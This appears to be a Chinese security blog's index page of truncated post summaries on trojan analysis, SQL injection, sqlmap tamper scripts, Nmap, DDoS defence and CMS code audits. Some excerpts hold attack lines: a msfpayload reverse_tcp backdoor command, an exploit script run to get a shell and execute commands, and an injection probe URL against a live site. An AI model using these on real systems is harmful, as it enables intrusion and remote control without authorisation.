摘要:
病毒来源:朋友服务器发现此木马 当时为了提样本搞了很久,一直找恢复文件,对提取样本有研究的朋友还请指导指导。 文件名:vister.exe MD5:30866adc2976704bca0f051b5474a1ee 此处创建了一个进程 申明了一个2800大小的Space.buffer 并将地址mov到 阅读全文
摘要:
PHP数据库操作:从MySQL原生API到PDO test 本文将举详细例子向大家展示PHP是如何使用MySQL原生API、MySQLi面向过程、MySQLi面向对象、PDO操作MySQL数据库的。 为了后面的测试,先建立数据库表test。包含表名user,score。 CREATE TABLE ` 阅读全文
摘要:
入口点变异push EBP 出栈pop EBP 压栈SUB ESP 68 > ADD ESP -68CALL 获取跳转地址直接跳转 cmp a,b 比较a与bmov a,b 把b的值送给aret 返回主程序nop 无作用,英文“no operation”的简写,意思是“do nothing”(机器码 阅读全文
摘要:
SWF代码如下: 其中XMLConfig(_local2.url) 未经过过滤传到_local14 _Local14变量初始化。 _local2.url为获取外部参数。 如果要问我为什么,往上走看到parameters。 可控,走到XMLConfig为获取XML。 找到XML地址、如下: logou 阅读全文
摘要:
Boolean-based blind SQL injection(布尔型注入) Error-based SQL injection(报错型注入) UNION query SQL injection(可联合查询注入) Stacked queries SQL injection(可多语句查询注入) T 阅读全文
摘要:
想必在用爬虫进行抓取URL的时候,结果需要进行筛选。 http://可用notepad进行批量去掉。 但是如果遇到这种该怎么处理呢。 http://www.baidu.com/sdasd/asdasd http://www.soso.com/asd.html 标红部分。 这里用gvim这款编辑器确实 阅读全文
摘要:
端口扫描基础 虽然Nmap这些年来功能越来越多, 它也是从一个高效的端口扫描器开始的,并且那仍然是它的核心功能。 nmap <target>这个简单的命令扫描主机<target>上的超过 1660个TCP端口。 。许多传统的端口扫描器只列出所有端口是开放还是关闭的, Nmap的信息粒度比它们要细得多 阅读全文
摘要:
为了对抗 DDoS(分布式拒绝服务)攻击,你需要对攻击时发生了什么有一个清楚的理解. 简单来讲,DDoS 攻击可以通过利用服务器上的漏洞,或者消耗服务器上的资源(例如 内存、硬盘等等)来达到目的。DDoS 攻击主要要两大类: 带宽耗尽攻击和资源耗尽攻击. 为了有效遏制这两种类型的攻击,你可以按照下面 阅读全文
摘要:
01. apostrophemask.py 用UTF-8全角字符替换单引号字符 02. apostrophenullencode.py 用非法双字节unicode字符替换单引号字符 03. appendnullbyte.py 在payload末尾添加空字符编码 04. base64encode.py 阅读全文
摘要:
全局都使用dede的防注入函数,这个就留给大家去想办法了。。我们跟踪到duomi\member\member.php}elseif($action=='chgpwdsubmit'){ if(trim($newpwd)trim($newpwd2)) { ShowMsg('两次输入密码不一致','-1... 阅读全文
摘要:
经朋友所托得到这个管理系统进行审计。 环境搭建好后一大推错误,后来验证码又不显示,折腾了好久,最后没找到原因,直接把验证码去掉了。(不涉及登陆) 跟进到认证登录处文件查看,代码如下: 直接看关键部分。 获取表单过来的user进行判断出,开始以为存在注入,因为没有进行校验和过滤。 后来才看到正则进行了 阅读全文
摘要:
看文件 :/framework/model/www/site_model.php 66行估计主机头注入很少能发现。在多处调用了我们就直接拿留言板处测试。public function get_one_from_domain($domain='') { $sql = "SELECT site_id F... 阅读全文
摘要:
想起早些年就已经很少玩审计了,后来因为合作方的原因就down了一份源码分析了一些,在很多地方都调用过滤函数。最后在评论一处发现了未过滤的地方,我们看看。见文件:function\plugs\Comment\product-content.php 97-109行$sql="insert into `o... 阅读全文
摘要:
反弹的shell,这里介绍两种payload: Windows/meterpreter/reverse_tcp Windows/meterpreter/reverse_https windows/meterpreter/reverse_http 生成反弹后门: msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.1 lport=... 阅读全文
摘要:
利用脚本。exp:python jj.py http://123.123.123.123 ->直接GETSHELL python jj.py http://123.123.123.123 "whoami" ->执行命令#author:we8i&90secimport url... 阅读全文
摘要:
下面附上内网渗透中可能用得上的msf 模块 scanner/portscan/syn SYN端口扫描scanner/portscan/tcp TCP端口扫描 auxiliary/scanner/smb/smb_login SMB登录测试扫描use windows/smb/psexec SMB登录,可 阅读全文
摘要:
手头的事做完了,看到朋友空间转个骗人抽奖的网站,不知道怎么的就跳转到sinaapp网站下了然后旁注到这个站,记录一下很少能遇见手工的注入的站了。 http://xxx.sinaapp.com/species_show.php?id=1%20order%20by%2018 经过order by的测试为 阅读全文